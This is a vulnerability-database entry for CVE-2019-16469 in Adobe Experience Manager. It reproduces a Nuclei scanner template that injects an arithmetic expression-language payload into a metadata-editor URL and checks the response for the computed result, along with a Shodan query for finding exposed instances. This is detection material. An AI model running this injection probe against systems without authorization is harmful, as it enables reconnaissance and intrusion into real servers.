Lucene search

K
nucleiProjectDiscoveryNUCLEI:CVE-2019-16469
HistoryJan 27, 2024 - 2:32 p.m.

Adobe Experience Manager - Expression Language Injection

2024-01-2714:32:56
ProjectDiscovery
github.com
23
cve
cve2019
aem
expression language injection
sensitive information disclosure

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.9 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.139 Low

EPSS

Percentile

95.6%

Adobe Experience Manager versions 6.5, 6.4, 6.3, 6.2, 6.1, and 6.0 has an expression language injection vulnerability.
id: CVE-2019-16469

info:
  name: Adobe Experience Manager - Expression Language Injection
  author: DomenicoVeneziano
  severity: high
  description: |
    Adobe Experience Manager versions 6.5, 6.4, 6.3, 6.2, 6.1, and 6.0 has an expression language injection vulnerability.
  impact: |
    Successful exploitation could lead to sensitive information disclosure
  remediation: |
    To fix the vulnerability, it is necessary to update the Adobe AEM instance using the Service Pack 6.5.3.0
  reference:
    - https://nozero.io/en/cve-2019-16469-adobe-aem-expression-language-injection/
    - https://owasp.org/www-community/vulnerabilities/Expression_Language_Injection
    - https://nvd.nist.gov/vuln/detail/CVE-2019-16469
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N
    cvss-score: 7.5
    cve-id: CVE-2019-16469
    cwe-id: CWE-917
    epss-score: 0.17165
    epss-percentile: 0.95967
    cpe: cpe:2.3:a:adobe:experience_manager:*:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 1
    vendor: adobe
    product: experience_manager
    shodan-query: http.component:"Adobe Experience Manager"
  tags: cve,cve2019,aem,eli,csti
variables:
  num1: "{{rand_int(800000, 999999)}}"
  num2: "{{rand_int(800000, 999999)}}"
  result: "{{to_number(num1)*to_number(num2)}}"

http:
  - method: GET
    path:
      - '{{BaseURL}}/mnt/overlay/dam/gui/content/assets/metadataeditor.external.html?item=$%7b{{num1}}*{{num2}}%7d'

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - 'data-formid="{{result}}"'
          - 'Embed Code'
        condition: and

      - type: status
        status:
          - 200
# digest: 4a0a0047304502201ca94f30ff7dbb4635b2f005767ba3eaa9489c54f2ad57c33e2f23df55c1d0b6022100d0ac6506529e1e6fe832db0634f3a6ca0f8c77d16d959597a3421de3c2f04aaf:922c64590222798bb761d5b6d8e72950

7.5 High

CVSS3

Attack Vector

NETWORK

Attack Complexity

LOW

Privileges Required

NONE

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

HIGH

Integrity Impact

NONE

Availability Impact

NONE

CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N

7.9 High

AI Score

Confidence

High

5 Medium

CVSS2

Access Vector

NETWORK

Access Complexity

LOW

Authentication

NONE

Confidentiality Impact

PARTIAL

Integrity Impact

NONE

Availability Impact

NONE

AV:N/AC:L/Au:N/C:P/I:N/A:N

0.139 Low

EPSS

Percentile

95.6%